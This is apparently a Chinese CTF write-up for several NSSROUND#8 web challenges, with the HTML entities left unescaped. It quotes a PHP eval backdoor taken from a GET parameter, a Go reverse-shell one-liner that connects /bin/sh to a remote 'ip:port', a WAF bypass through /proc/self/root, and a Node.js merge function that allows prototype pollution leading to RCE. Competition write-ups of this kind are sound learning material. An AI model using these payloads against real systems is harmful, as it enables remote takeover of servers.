NSSROUND#8[Basic]


error_reporting(0);
if (isset($_GET[&＃39;N_S.S&＃39;])) {
eval($_GET[&＃39;N_S.S&＃39;]);
}
if(!isset($_GET[&＃39;file&＃39;])) {
header(&＃39;Location:/index.php


注意要把参数_变成[ 否则后面的.会变成下划线。

上传的文件会被go自动执行&＃xff0c;使用go反弹shell。
package main;import"os/exec";import"net";func main(){c,_:&＃61;net.Dial(“tcp”,“ip:port”);cmd:&＃61;exec.Command(“/bin/sh”);cmd.Stdin&＃61;c;cmd.Stdout&＃61;c;cmd.Stderr&＃61;c;cmd.Run()}’
然后flag找半天&＃xff0c;在/home/galf里&＃xff0c;base64解密即可

有waf&＃xff0c;/var/www/html出现就会waf&＃xff0c;但是直接又读不了index.php&＃xff0c;尝试用/proc/self/root连接回/使用脏数据绕过看看。

看到这道题&＃xff0c;看到merge就知道和原型链污染有关&＃xff0c;但是node.js基础太差了&＃xff0c;很懵&＃xff0c;也搞不出来&＃xff0c;所以只能看看出题人WP了

分成了一个submit和一个上交文件两个模块&＃xff0c;源码在附件可以看到

const express &＃61; require("express");
const path &＃61; require("path");
const fs &＃61; require("fs");
const multer &＃61; require("multer");
const PORT &＃61; process.env.port || 3000
const app &＃61; express();
global &＃61; "global"
app.listen(PORT, () &＃61;> {
console.log(&＃96;listen at ${PORT}&＃96;);
});
function merge(target, source) {
for (let key in source) {
if (key in source && key in target) {
merge(target[key], source[key])
} else {
target[key] &＃61; source[key]
}
}
}
let objMulter &＃61; multer({ dest: "./upload" });
app.use(objMulter.any());
app.use(express.static("./public"));
app.post("/upload", (req, res) &＃61;> {
try{
let oldName &＃61; req.files[0].path;
let newName &＃61; req.files[0].path &＃43; path.parse(req.files[0].originalname).ext;
fs.renameSync(oldName, newName);
res.send({
err: 0,
url:
"./upload/" &＃43;
req.files[0].filename &＃43;
path.parse(req.files[0].originalname).ext
});
}
catch(error){
res.send(require(&＃39;./err.js&＃39;).getRandomErr())
}
});
app.post(&＃39;/pollution&＃39;, require(&＃39;body-parser&＃39;).json(), (req, res) &＃61;> {
let data &＃61; {};
try{
merge(data, req.body);
res.send(&＃39;Register successfully!tql&＃39;)
require(&＃39;./err.js&＃39;).getRandomErr()
}
catch(error){
res.send(require(&＃39;./err.js&＃39;).getRandomErr())
}
})


obj&＃61;{
errDict: [
&＃39;发生肾么事了&＃xff01;&＃xff01;&＃xff01;发生肾么事了&＃xff01;&＃xff01;&＃xff01;&＃39;,
&＃39;随意污染靶机会寄的&＃xff0c;建议先本地测&＃39;,
&＃39;李在干神魔&＃x1f479;&＃39;,
&＃39;真寄了就重开把&＃39;,
],
getRandomErr:() &＃61;> {
return obj.errDict[Math.floor(Math.random() * 4)]
}
}
module.exports &＃61; obj


好像大概就是通过merge原型链污染&＃xff0c;使得exports污染为{“./err”:“上传的文件”}&＃xff0c;然后再使得报错&＃xff0c;触发上传文件实现RCE&＃xff0c;具体分析可以看出题人WP。

出题人WP